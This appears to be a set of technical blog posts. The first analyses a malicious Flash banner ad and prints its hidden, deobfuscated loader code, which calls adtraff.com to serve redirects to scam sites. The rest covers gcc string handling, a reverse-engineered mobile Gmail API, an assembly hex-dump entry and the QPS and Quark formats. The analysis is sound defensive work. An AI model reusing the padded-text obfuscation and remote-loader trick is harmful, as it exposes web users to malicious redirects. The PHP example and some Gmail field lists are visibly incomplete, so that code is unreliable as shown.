Malicious Banner Ad

We ran into a malicious banner ad yesterday. People would randomly get redirected to a malicious website. You can imagine that it's a pretty tough thing to diagnose. It turned out to be a flash ad. I was able to disassemble the banner ad to see how it worked. The banner is "protected" and compressed, so hex editing the banner doesn't show any text.

Using Flare to decompile the actionscript in the swf, I found this snippet of code:

this[(a2.split(' ')).join('')]('m1', this[(a3.split(' ')).join('')]());
_root[(a4.split(' ')).join('')][(a5.split(' ')).join('')]((a6.split(' ')).join(''),(a7.split(' ')).join('')) == (a8.split(' ')).join('') && this.m1[(a0.split(' ')).join('')]((a1.split(' ')).join('') + '&u=' + (new Date()).getTime());

Definitely looks like someone is trying to hide something, but there wasn't anything else in the actionscript.. certainly no getURLs or loadMovies.

I used the excellent swfmill program to convert the swf into xml. The output contains markup of every element in the swf. It was there that I found the source of a2,a3,a4, etc.

<DefineEditText objectID="5" wordWrap="0" multiLine="0" password="0" readOnly="1" autoSize="0" hasLayout="1" notSelectable="0" hasBorder="0" isHTML="0" useOutlines="0" fontRef="4" fontHeight="0" align="2" leftMargin="0" rightMargin="0" indent="0" leading="40" variableName="a0" initialText=" loadMovie">

There are text boxes (11 in all) all over the movie, they all are padded with hundreds of spaces at the beginning so they appear to be blank.

If you substitute out all splits and joins in the initial actionscript, you get the following:

createEmptyMovieClip('m1', getNextHighestDepth());
_url.substr(0,7)=="http://" &&
m1.loadMovie("http://adtraff.com/statsa.php?campaign=plentyup" + '&u=' + (new Date()).getTime());

So basically, this banner ad looks like a normal banner ad. However, each time you load it, it loads a movie clip from adtraff.com. Most of the time, this movie clip is blank. So you wouldn't notice a thing. However, sometimes the movie clip sent back from adtraff.com contains a getURL() that redirects the user to a malicious webpage like performanceoptimizer.com or malware-scan.com.


char pointer versus char array

There are two basic ways to assign a string literal to a local variable.

char *p = "string";
char a[] = "string";

I was curious to see how gcc handles the two.

In both cases, "string" is put into .rodata This means that with the first method, you must not modify the contents of "string".

p[3]='o'; // this causes a segfault.

So technically, the first method should be:

const char *p = "string";

With the pointer method, gcc will initialize the variable using the following:

mov dword ptr [ebp-8], pointer_to_string

Calling a function and passing p will result in:

mov eax,[ebp-8]
mov [esp], eax
call function_name

With the array method, however, gcc reserves space for the string on the stack and will initialize the variable like so:

mov eax, [pointer_to_string]
mov [ebp-15h], eax
mov eax, [pointer_to_string+4]
mov [ebp-11h],eax
mov eax,[pointer_to_string+8]
mov [ebp-0dh],eax
movzx eax,byte ptr [pointer_to_string+12]
mov [ebp-9],al

As you can see, it moves the string into the stack 4 bytes at a time. If the string is more than 64 bytes long, then gcc will actually create a call to memcpy:

lea ecx,[ebp-49h]
mov edx, pointer_to_string
mov eax,41h
mov [esp+8],eax
mov [esp+4],edx
mov [esp],ecx
call wrapper_to_memcpy

Regardless of how long the string is, passing the array to a function results in the following:

lea eax,[ebp-15h]
mov [esp],eax
call function_name

Passing the variable around is virtually identical for both array and pointer. However, initializing the variable takes a huge performance and space penalty for the array. Only use the array method if you intend on changing the string, it takes up space in the stack and adds some serious overhead every time you enter the variable's scope. Use the pointer method otherwise.


Mobile Gmail API

Did you know that Gmail provides a handy, light-weight API for gmail? Google's gmail midlet uses this API.

Mobile Gmail Basics

First thing to note, all responses from the server are in the form of UTF8 string lists. There is a 16 bit word (in network byte order) that represents the length of the string, followed by that many bytes. Then another 16 bit word for the next string, and so on. The response is usually terminated with an empty string (16 bit length is 0).

Secondly, all communication is done via POST requests to a single URL. This URL is https://mail.google.com/mail/m/12345 where 12345 is a random number, presumably to defeat proxy caches common with mobile phones. Please note that all communication is done over SSL.

Third, all requests from the server must contain the API version. Include "p=1.1" as the very first POST variable.

Logging In

Logging in is rather easy. You send a request to the gmail API with the following POST variables:

zym=l (that's a lowercase L)

That's pretty self explanatory.

The very first string in the server's response will be the Status. This will tell you if you were successful in logging in or not. The server will also set a bunch of cookies. You must save these cookies and send them back from this point on. This is what keeps you "logged in".

If Status is "E", then there was some sort of error.
The strings that follow the Status string are listed below.

CAPTCHA_token (optional)
CAPTCHA_image (optional)

error_type is the type of error, it will be either "C" for CAPTCHA required, or "B" for standard errors. If the error is "C" then CAPTCHA_token and CAPTCHA_image will be present. CAPTCHA_image contains the raw data for the image.

If you get a CAPTCHA required error, have the user fill out the captcha information, and send back the following POST variables:

zym=l (again, lowercase L)

$token is the CAPTCHA_token from the server, $answer is the user's answer.

If the Status is "T" then you were successful in logging in, and the packet that is returned is the Inbox packet.

Inbox Packet

The Inbox packet is marked with a Status of "T". The strings that follow the Status string are listed below.


start_thread is the index for the first message returned. num_threads is the number of threads returned. total_threads is the total number of threads in the inbox. In gmail, at the top you see "1-50 of 513". num_threads would be 50, start_thread would be 0, and total_threads is 513. num_unread is the number of unread messages in your inbox.

threads is an array of strings representing each thread. The strings in each thread are as follows:


is_read is "T" if the message has been read, "F" otherwise. is_starred is "T" if the thread has been starred, "F" otherwise. has_attachments is "T" if the thread has attachments, "F" otherwise. from is a user-friendly version of the participants of the thread, e.g. "Jon, me (5)". subject is the subject line of the thread. time is a user-friendly version of the time, e.g. "11:08 am" or "Jul 27". Finally, url contains the ID number for the thread. It is given as "?th=xxxxxxxxxxx" you'll want to strip out the "?th=" part.

Back to the inbox format for a second. num_labels is the number of labels you have set up. They are followed by an array of label strings. The label strings are pretty simple. They look like so:


label is the label itself. num_unread is the number of unread messages in that label.

Contact List

Now let's look at how to retrieve the contact list. You send a simple request with the following POST variables: v=cl, pnl=$type $type is the type of contact list to retrieve. "f" is frequent. This is an abridge contact list with just the people you frequently mail. "a" is all, this is the entire contact list. The resulting packet is formatted the same, regardless of which type you request.


num_contacts is obviously the number of contacts in the following contact list. Each contact looks like so:


Pretty simple. More detailed contact information doesn't seem to be available.

Read a Thread

Reading a thread is fairly straightforward. Send a request with the following POST variables:


$thread_id is the id of the thread you wish to pull. Just like the Inbox, the first string is a Status. If it is "C" then you were successful in pulling a thread, if it is "E" then there was an error. The strings following the status string are below.

num_attachments (optional)
attachments[] (optional)

thread_subject is the subject line for the thread. num_messages is the number of messages contained in this thread. This is followed by one or more message_headers. Then the body of the selected message is present. The body is represented by several strings, each starting with a colon ":". Each string represents a full line in the message, minus the line break. If there are attachments in the selected message, then num_attachments is the first string without a leading colon. This is followed by a number of attachment strings.

The message_header looks like so.


is_read is "T" if the message has been read, "F" otherwise. is_starred is "T" if the message has been starred, "F" otherwise. has_attachments is "T" if the message has attachments, "F" otherwise. from_friendly is a user-friendly version of the from address. to_friendly is a user-friendly version of the to addresses. date_friendly is a user-friendly version of the message date. from_address is the raw from address. b1 is "b", I'm not sure what this represents. to_address is the raw to address. b2 and b3 are "b", I'm not sure what these represent. I believe b2 might contain cc: addresses, if present. timestamp is the actual timestamp for the message. subject is the subject for the message. url contains the id for the message, in the format "?d=u&n=nnn#m_xxxxxxx". "xxxxxx" is the message id. "nnn" is the message number in the thread. b4 is "b", and I'm not sure what it represents. from_address2 and to_address2 seem to be identical to from_address and to_address.

Each attachment has the following format:


Each of these is fairly self-explanatory.

Changing the selected message in a thread is fairly simple. You use the first part of the message url (the "d=u&n=nnn") part and pass those variables along with the regular read thread variables. It will return the same packet as above, only with the selected message body.

Previewing Attachments

As far as I can tell, the gmail mobile API doesn't allow you to download attachments, only to retrieve "previews" of the attachments. To do so, you issue a request with the following POST variables:


$attachment_id is obviously the attachment id number you wish to view. $message_id is the "xxxxxxx" part of "#m_xxxxxx" in the message url. $graphics_mode is either "1" or "0". 1 means you can handle image attachments. 0 means text only. Finally there's the $width and $height which specify the maximum width and height of the device.

The first string is a Status string which will be either 't' for text attachments or 'i' for image attachments.

Let's look at the text attachment first. The strings after the Status are below.


a_mode is "A", not sure if it can be anything else. attachment_id is the id of the attachment. filename is the filename of the attachment. Finally attachment_body is the body of the attachment.

Now let's look at an image attachment.


filename is the filename of the attachment, null_string is the 00 00 empty string, this is followed by the actual attachment. In this case, attachment_file is not a string, it does not have a length. Instead it is just a big chunk of data that appears after the null_string.

If Google couldn't preview your attachment for some reason or another, it will return a text attachment with the error message in the body.

Mark Thread

Now let's look at how to mark a thread. This means either Star a thread, or mark it read or unread, or archive it. You send a request with the following POST variables.


$action is the action to take.
st = Star Thread
xst = Unstar Thread
ur = Mark Unread
rd = Mark Read
ar = Archive Thread
tr = Trash Thread
sp = Mark as Spam

$thread_id is the id of the thread to modify. Yes that is a "t=" and not a "th=". This is important. Finally there's $GMAIL_AT. This should simply be the GMAIL_AT cookie that gmail sent when you logged in.


If you can handle the inbox, you can handle searching. First you POST a request with:

q=$query (for $search_type="q")
cat=$category (for $search_type="cat")
sz=$num_per_page (optional)
st=$start (optional)

$search_type is the type of "search". "q" is for query searches, "cat" is for category searches. Viewing your Drafts Folder is done with a category search.

$query is the search query (it is not present at all for category searches). If you prefix your query with "L:" you can do a label view. For example, if you have a label called "Work" you can view your work folder by doing a "q" search with a q=L:Work

$category is the category to view. This is not present at all for query searches. Possible categories are: "Inbox", "Starred", "Chats", "Sent Mail", "Drafts", "All Mail", "Spam", "Trash".

$sz is the number of messages per page to display. This is optional, defaulting to 50 if not present.

$st is the start offset. For example, if you have $sz=20, then when you want to view the next page of results, you would re-issue the same search command, only setting $st=20 then $st=40, and so on. This is optional, and it will default to 0 if not present.

The response from the server for doing any of these searches is identical to the packet you got for the inbox. In fact, you can include any of the above variables when you log in to affect the initial results you get on successful login.

Sending Mail

Finally, we see how to actually send mail. You send a packet with the following POST variables:

attach=$attachment (optional)

$GMAIL_AT is the GMAIL_AT cookie. $to_addresses is the comma-separated list of addresses to send mail to. $cc_addresses contains any carbon copy addresses, and $bcc_addresses contains any blind carbon copy addresses. $subject is the subjectline of the email, $body is the body of the email. $attachment contains any attachments, but I haven't figured out the format of the attachment yet.

Working Example

What fun is it without a working example? Here's a simple example in PHP that connects to gmail and prints out the first 10 items of your inbox.



if ($status!='T') die("Error logging in");
readUTF($data); //id
echo "Displaying ".($start+1)." to ".($num_msgs+$start).
" of $total<br />\n";
echo "$num_unread unread messages<br />\n";
echo "<table><tr><th>Flags</th><th>From</th>";
echo "<th>Subject</th><th>When</th></tr>\n";
for ($i=0;$i<$num_msgs;$i++)
echo "<tr><td>";
echo ($isread=='T')?"R":"r";
echo ($isstar=='T')?"*":"_";
echo ($hasattach=='T')?"A":"a";
echo "</td><td>$from</td><td>$subject</td>";
echo "<td>$time</td></tr>\n";
echo "</table>\n";
for ($i=0;$i<$numlabels;$i++)
echo "$label ($num_unread)<br />\n";

function readUTF(&$feed)
return $utf;



128-bit programming challenge

Here's my entry for the 128-bit programming challenge. Not a single lookup table in there. The resulting stripped binary is down to exactly 500 bytes.

; nasm -f elf hex.asm
; ld hex.o

section .text
global _start
mov ecx,10h
mov esi,hex
mov edi,buffer
movzx eax,byte [esi]
mov ah,al
and al,0fh
cmp al,0ah
sbb al,69h
mov [edi+1],al
shr ax,12
cmp al,0ah
sbb al,69h
mov [edi],al
mov [edi+2],byte 20h
add edi,3
inc esi
loop lp
mov [edi],byte 0ah
mov ecx,buffer
mov eax,4
xor ebx,ebx
inc ebx
mov edx,31h
int 80h
mov eax,1
mov ebx,0
int 80h
or ecx,edi
adc [edx],eax
jz lp2
pop ebx
fadd dword [ecx+56h]
lds esp,[ebx+56h]
mov al,al
section .bss
buffer resb 31h


QPS Protocol

The following describes the format of the QPS 3.5 protocol. Earlier versions of QPS are very similar, with only minor packet changes. All communication between the client and the QPS server is done via Messages.

Message from Client to Server.
0000 0002 Session ID
0002 0002 Code
0004 0004 Version (0x003f003f)
0008 0002 Sequence Number
000a 0004 Sub-Data Length
000e 0004 Packet Length
0012 **** Data
**** **** Sub-Data

Just like the Quark file format, everything is stored in Network Byte Order. Packet length is the length of Data + length of Sub-Data. Sequence numbers start at 1 and are incremented for each message sent by the client. Session ID starts at 0, and is initialized by the server upon successful login.

Message from Server to Client
0000 0004 Version (0x003f003f)
0004 0002 Code
0006 0002 Status
0008 0002 Sequence Number
000a 0004 Flags
000e 0004 Length
0012 **** Data

All server communication is a response to a message from the client. The sequence number can be used to identify which request from the client prompted this response.

Signon Packet (0x05)
The Signon packet is the first packet sent from the client to the server. It contains the username and password of the client.
0000 0012 Message Header (Code: 0x05)
0012 0001 Username Length
0013 **** Username
**** 0001 Password Length
**** **** Password
**** 0004 0x100

0000 0012 Response Header
0012 0004 Session ID

If the Code is 0, then login was successful. Otherwise, the login failed. The Session ID returned should be used in all future packets sent by the client.

GetHeaders (0x4a)
This packet retrieves a list of headers from the server.
0000 0012 Message Header (Code: 0x4a)

0000 0012 Response Header
0012 0004 Unknown
0016 0004 Number of Header Items
001a 0034 Header Item 0
004e 0034 Header Item 1...

Header Item
0000 0004 Header ID
0004 0004 Data Type
0008 0004 Reserved
000c 0001 Name Length
000d 0027 Name

The Data Types supported are:
0001 String
0002 Time Stamp
0004 Integer
0005 Float
0006 Checkbox
0007 Dropdown

GetPublications (0x66)
This packet asks the server for the list of Publications hosted by the server.
0000 0012 Message Header (Code: 0x66)
0012 0014 All zeroes

0000 0012 Response Header
0012 0008 Unknown
001a 0004 Number of Publications
001e 0001 Publication 0 Name Length
001f **** Publication 0 Name
**** 0004 Publication 0 ID
**** 0001 Publication 1 Name Length
**** **** Publication 1 Name
**** 0004 Publication 1 ID...

If Publication Name Length is even, then there's a 1 byte pad at the end of the
Publication Name.

GetStatuses (0x2b)
This call gets all the possible Statuses from the server. Statuses may differ
across publications, which is why the publication is sent with the request.
0000 0012 Message Header (Code: 0x2b)
0012 0001 Publication Length
0013 0043 Publication Name

Why we don't send the ID instead of the Name is a mystery.

0000 0012 Response Header
0012 0008 Unknown
001a 0004 Number of Statuses
001e **** Status 0
**** **** Status 1...

0000 0004 Unknown
0004 0004 Status ID
0008 000e Unknown
0016 0001 Status Length
0017 **** Status Name
**** 0002 Unknown

If Status Length is even, then Status Name has a 1 byte pad at the end of it.

GetRepositories (0x40)
This call returns the repository information (the file share where the story files are actually kept).
0000 0012 Message Header (Code: 0x40)

0000 0012 Response Header
0012 0004 Number of Repositories
0016 **** Repository 0
**** **** Repository 1...

0000 0004 Length of Repository packet
0004 0032 Unknown
0036 0001 Repository Name Length
0037 **** Repository Name
**** 009a Unknown
**** 0002 Key 0
**** 0002 Value 0 Length
**** **** Value 0
**** 0002 Key 1
**** 0002 Value 1 Length
**** **** Value 1... (until Key=0xffff)

If Value Length is odd, then the Value has a 1 byte pad at the end of it.

The Keys are below.

0x09 Mount Info
0x12 Pathname
0x13 Mount Point

For Mount Point and Pathname, the Value is pretty simple, it's simply a string.
Mount Info is more complicated.

0000 0002 Unknown
0002 0004 Mount Type
0006 **** Mount Data

Mount Data depends n the Mount Type. There are two common mount types. "cifs" for Samba, and "afpm" for Apple File Share.

0000 000a Unknown
000a **** CIFS Share

0000 000c Unknown
000c 0002 Offset to IP Length (from beginning of Mount Data)
000e 0002 Offset to Share Length (from beginning of Mount Data)
**** 0001 IP Length
**** **** AFP IP
**** 0001 Share Length
**** **** AFP Share

Search (0x14)
The client sends the search criteria to the server to create a new "search session".
0000 0012 Message Header (Code: 0x14)
0012 0004 0x8

This is the first packet that contains sub-data. This is defined below.
0000 0004 Sub Data Length
0004 0004 0x00060006
0008 0004 0xb46dd345
000c 0020 All zeroes
002c 0004 0x2
0030 0004 0xaf7fffff
0034 0004 0x48
0038 0004 Length of Publications
003c 0004 Offset of Publication 0 ID
0040 0004 Queries Length
0044 0004 Offset of Queries
**** 0004 Publication 0 ID
**** 0004 0x0
**** 0004 Publication 1 ID
**** 0004 0x0...
**** **** Queries

0000 0004 Query Length
0004 0004 Header Key
0008 0004 Header Type
000c **** Query Value

Query Value depends on the Header Type

Header Type 6 (Checkbox):
0000 0004 0x2
0004 0004 0x10000
0008 0004 0x1
000c 0004 0x18
0010 0004 0x1
0014 0004 0x1
0018 0004 0x1
001c 0004 Checkbox Value (0 or 1)
0020 0004 0x0

Header Type 7 (Dropdown):
0000 0004 0x0
0004 0004 0x10000
0008 0004 0x1
000c 0004 0x18
0010 0004 0x1
0014 0004 0x1
0018 0004 0x1
001c 0004 Dropdown ID
0020 0004 0x0

The server will return your search ID.

0000 0012 Response Header
0012 0002 Search ID

This Search ID will be used to fetch the results.

SearchCount (0x42)
This message requests the total # of results from the search.
0000 0012 Message Header (Code: 0x42)
0012 0002 Search ID
0014 000e 0
0022 0001 1
0023 0001 0

There is a Sub-Data component attached to this message.
0000 0004 1

The server will respond with the number of stories that match your query.
0000 0012 Response Header
0012 0004 Number of Stories

GetSearchResults (0x43)
This message gets a bunch of search results.
0000 0012 Message Header (Code: 0x43)

The server will respond with the results. If Code is not zero, then the server is
finished answering. If Code is zero, the response contains a list of matching stories.
You should continue to call GetSearchResults until the server is done.
0000 0012 Response Header
0012 0002 Entry 0 Length
0014 **** Entry 0
**** 0002 Entry 1 Length
**** **** Entry 1...

0000 0010 Unknown
0010 0001 File Status
0011 0025 Unknown
0036 0001 Filename Length
0037 **** Filename

If File Status has high-bit set, then the story is checked out by someone.


After doing a search.. the client should listen for updates from the server. The
server will send new updates whenever stories get added or removed from
the search results. Updates can be identified because they have a Status of 5.
The message will have its Flags set to identify whether or not the story is being added or removed from the search results. If the Flags & 0x100 then the story is being added, otherwise it is being removed.
0000 0012 Response Header
0012 0008 Unknown
001a 0001 Filename Length
001b **** Filename

OpenHeader (0x08)
This message will open the header of a story for reading and editing.
0000 0012 Message Header (Code: 0x08)
0012 0008 0
001a 0001 Filename Length
001b 0100 Filename
011b 0001 2 (for writing)

0000 0012 Response Header
0012 0002 Header ID

ReadHeader (0x09)
This message will fetch the current story header information.
0000 0012 Message Header (Code: 0x09)
0012 0002 Header ID

0000 0012 Response Header
0012 0120 Unknown
0132 0004 Number of Header Items
0136 0014 Header Item 0
014a 0014 Header Item 1...

Header Item
0000 0004 ID
0004 0004 Type
0008 0004 Reserved
000c 0004 Flags
0010 0004 Value

For some Types, Value may reference data in the packet. This data is located at 0x118+Value from the beginning of the current Header Item.

If Flags&0x1000000 then the value is blank. This is important, because the flags may say a field is blank, but the Value might point to data.

SaveHeader (0x0a)
0000 0012 Message Header (Code: 0x0a)
0012 0002 Header ID

The raw Header should be put into the SubData part of the message.

0000 0012 Response Header

CloseHeader (0x0e)
This message tells the server that we're done with the header.
0000 0012 Message Header (Code: 0x0e)
0012 0002 Header ID

If you made changes to the header, you MUST open the file on disk, and make the same changes to the end of the file. Otherwise, if the QPS server reboots, all changes you made will be undone.

SignOff (0x16)
This message tells the server that we want to sign off.
0000 0012 Message Header (Code: 0x16)
0012 0002 Session ID

0000 0012 Response Header

Close (0x06)
After we've signed off, we need to close the socket or sign back on. If we close the socket, we send this packet before doing so.
0000 0012 Message Header (Code: 0x06)

Quark file format

This is the file format used by Quark Copydesk.

The file is broken into chunks. Each chunk is exactly 256 bytes long. Chunks are identified by their ID number. Chunk 1 starts at position 0, Chunk 2 starts at position 512, and so on. The first chunk in the file contains the header followed by the TOC.

Quark Header:
The first thing in this file is a 26 byte Quark Header.

0000 0004 File Format Version (0x001b001b)
0004 0008 Identifier ("SPIFSPOC")
000c 0004 QPS Header Offset
0010 000a Reserved
The QPS Header Offset points to the QPS Header attached to the end of the file.

Table of Contents:
Immediately after the header is a table of contents. This table lists the positions in the file for all the interesting sections of the file. Each entry is the Chunk ID of the start of the section.

0000 0004 QPS Column
0004 0004 QPS History
0008 0004 Unknown
000c 0004 Unknown
0010 0004 Backup Color
0014 0004 Backup Font
0018 0004 Color
001c 0004 Font
0020 0004 Component
0024 0004 Style
0028 0004 Unknown
002c 0004 Unknown
0030 0004 Component Data

Some of the sections are unknown. The main sections we are interested in are Font, Component, Style, and Component Data.

General Section Format:
Sections are made up of one or more chunks. Each Chunk is formatted as follows.

0000 00fc Chunk Data
00fc 0004 Next Chunk ID

Next Chunk ID will be 0 if this is the last chunk in the section. Otherwise it points to the next chunk that makes up the current section's data.

If the Next Chunk ID is negative, then the chunk it references is a special chunk called a Contiguous Chunk. Negate the Contiguous Chunk's ID to obtain the actual Chunk ID. A Contiguous Chunk looks different than a regular chunk.

0000 0002 Number of Contiguous Chunks
0002 **** Chunk Data
**** 0004 Next Chunk ID

Chunk Data is (Number of Contiguous Chunks)*256-6 bytes long. That means that if there is only 1 Contiguous Chunk, then Chunk Data is 250 bytes long, and Next Chunk ID is located at the end of the chunk.

This system means that all sections will be padded to fit into their respective chunks.

When describing section formats below, we will ignore the chunk system, and simply focus on the format of the data that is stuffed into those chunks.

Font Section:
The Font section contains a list of all the fonts used in this document. The fonts listed in this section are references in the rest of the file by their ID number.

0000 0004 Length
0004 0002 Number of Fonts
0006 **** Font Record 0
**** **** Font Record 1
**** **** Font Record 2 ...

Each Font Record looks like so.
0000 0002 Font ID
0002 0002 Padding
0004 0001 Font Name Length
0005 **** Font name
**** 0001 Short Name Length
**** **** Short Name

Style Section:
The Style section contains a list of all the Paragraph and Character styles used in the document. The overall section is structured as follows.

0000 0004 Length of Character Styles
0004 009a Character Style 0
009e 009a Character Style 1
0138 009a Character Style 2...
**** 0004 Length of Paragraph Styles
**** 00c6 Paragraph Style 0
**** 00c6 Paragraph Style 1
**** 00c6 Paragraph Style 2...

Each Character Style is 154 bytes long and is structured like so.

0000 0001 Length of Style Name
0001 0055 Style Name
0056 0002 Font ID
0058 0002 Font Flags
005a 0004 Font Size (16.16 fixed text size)
005e 001f Unknown
0079 0001 Hide Flag (notes have this flag set)
007a 0020 Unknown

Character Style Flags:
0001 Bold
0002 Italic
0004 Underline
0008 Outline
0010 Dropshadow
0020 Superscript
0040 Subscript
0100 Superior
0200 Strikeout
0400 Allcaps
0800 Smallcaps

Each Paragraph Style is 198 bytes long and looks like so.

0000 0001 Style Name Length
0001 003f Style Name
0040 0002 Style ID
0042 0016 Reserved
0058 0002 Justification
005a 006c Reserved

Component Section:
The Component section lists the name and type of all the components in the file.
0000 0004 Unknown
0004 0004 Component Section Length
0008 0008 Reserved
0010 0002 Number of Components
0012 001e Reserved
0030 008e Component 0
00be 008e Component 1
014c 008e Component 2...

Each Component is 142 bytes long and is structured like so.

0000 0018 Unknown
0018 0004 Component ID
001c 0004 Unknown
0020 0001 Type Length
0021 001f Component Type
0040 0001 Name Length
0041 001f Component Name
0060 002e Reserved

Component Data Section:
The Component Data section contains the raw data for each component.

0000 0002 Number of Components
0002 001c Component Index 1
001e 001c Component Index 2
003a 001c Component Index 3...

Some components have some extra information at the end of them... so you cannot rely on the offsets of any component until you have checked the component prior. Each component index is fairly straightforward.

0000 0004 Unknown
0004 0004 Flags
0008 0008 Reserved
0010 0004 Chunk ID
0014 0004 Component ID
0018 0004 Reserved
001c 0004 Extra Length
0020 **** Extra Data

If Flags is nonzero, then Extra Length and Extra Data are present. Extra Data contains information such as the filename that the component was imported from.

Each Component Index points to a Chunk that contains pointers to the raw text and styles of the component.

0000 0004 Length of text in this component
0004 0004 Number of Paragraphs * 8
0008 0004 Paragraph 0 Chunk ID
000c 0004 Paragraph 0 Length
0010 0004 Paragraph 1 Chunk ID
0014 0004 Paragraph 1 Length...
**** **** Character Styles
**** **** Paragraph Styles

The Paragraph Chunks are special Chunks. They don't follow the standard Chunk format at all. Paragraph 0 starts at the referenced Chunk ID, however, the data of that block just continues from the beginning for length bytes. There is no chunk metadata at all.

The Character Styles are shown below.

0000 0004 Number of Character Styles * 8
0004 0004 Style 0 ID
0008 0004 Style 0 Length
000c 0004 Style 1 ID
0010 0004 Style 1 Length...

The way the styles work is pretty simple. Style ID references a specific Style in the Style Section. This style applies for Length bytes of text. Then the next style referenced takes over and applies to the next Length bytes of text, and so on.

Paragraph Styles work in the exact same way.

QPS Header:
This header is identical the format used in the QPS Protocol (more on that later).